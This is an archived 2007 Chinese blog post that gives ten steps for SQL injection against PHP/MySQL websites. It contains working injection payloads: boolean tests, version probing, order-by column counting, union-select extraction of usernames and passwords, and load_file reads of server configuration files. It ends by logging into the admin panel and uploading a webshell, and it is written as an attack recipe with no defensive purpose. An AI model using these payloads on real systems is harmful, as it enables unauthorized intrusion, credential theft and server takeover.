Evonne

    <<  实况必备--原装PS2手鉴别办法 | 首页 | 网线  >>
  • 2007-10-12

    php注入十点基本步骤 - [xxx]

    版权声明:转载时请以超链接形式标明文章原始出处和作者信息及本声明
    http://coolevonne.blogbus.com/logs/10259011.html

    1.判断是否存在注入,加';and 1=1;and 1=2
    2.判断版本 and ord(mid(version(),1,1))>51 /* 返回正常说明是4.0以上版本,可以用union查询
    3.利用order by 暴字段,在网址后加 order by 10 /* 如果返回正常说明字段大于10
    4.再利用union来查询准确字段,如: and 1=2 union select 1,2,3,......./*直到返回正常,说明猜到准确字段数。如过滤了空格可以用/**/代替。
    5.判断数据库连接帐号有没有写权限,and (select count(*) from mysql.user)>0 /*如果结果返回错误,那我们只能猜解管理员帐号和密码了。
    6.如果返回正常,则可以通过and 1=2 union select 1,2,3,4,5,6,load_file(char(文件路径的ascii值,用逗号隔开)),8,9,10 /* 注:load_file(char(文件路径的ascii值,用逗号隔开))也可以用十六进制,通过这种方式读取配置文件,找到数据库连接等。
    7.首先猜解user表,如: and 1=2 union select 1,2,3,4,5,6.... from user /* 如果返回正常,说明存在这个表。
    8.知道了表就猜解字段,and 1=2 union select 1,username,3,4,5,6.... from user/*如果在2字段显示出字段内容则存在些字段。
    9.同理再猜解password字段,猜解成功再找后台登录。
    10.登录后台,上传shell。


    历史上的今天:

    伪造Session登陆后台 2007-10-12
    ISAPI扩展初窥 2007-10-12
    如何安装Ubuntu Linux 2007-10-12
    完美卸载IIS 2007-10-12
    IIS错误 安装程序无法复制文件文件IISApp.vbs 2007-10-12

    随机文章:

    伪造Session登陆后台 2007-10-12
    经典问题解决办法希望大家可以学习 2007-10-12
    google hacking的实现以及应用 2007-10-12
    cmd下重命名卷标 2007-10-12
    动易2006漏洞实战分析 2007-10-12

    收藏到:Del.icio.us




    Tag:
    引用地址:
    coolevonne 发表于21:30:21 | 编辑 | 继续话题 | 转发 | 分享 0

个人资料

coolevonne

日历

搜索

管理

  • 进入后台 写新日志
  • 文章管理 评论管理
  • 更换模板 访问统计

文章分类

  • xxx[24]
  • L.I.F.E[4]
  • O.T.H.E.R[7]
  • music[1]

Tag

    More..

    最新文章

    • 伪造Session登陆后台
    • ISAPI扩展初窥
    • 如何安装Ubuntu Linux
    • 完美卸载IIS
    • IIS错误 安装程序无法复制文件文件IISApp.vbs
    • 从后台得到webshell技巧大汇总
    • Better Man lrc
    • 一次Win2003服务器下的完全克隆
    • 经典问题解决办法希望大家可以学习
    • 入侵渗透思路
    全部日志>>

    最新评论

      链接

        存档

        • 2007 [36]
        • RSS 什么是RSS?
          用IM提醒我内容更新
          订阅到QQ邮箱
          订阅到鲜果阅读器
          订阅到Google阅读器
          订阅到抓虾阅读器
        • 《城客》第四期:创意之城
          博客大巴
          博客大巴使用指南
          博客大巴模板中心
          免费注册博客大巴
          一键博客搬家工具
          中文互动杂志城客
        Copyright © 2002-2009 BlogBus.com, All Rights Reserved. 博客大巴 版权所有
        博客大巴模板设计:简约风格2 | 作者: innocent_sin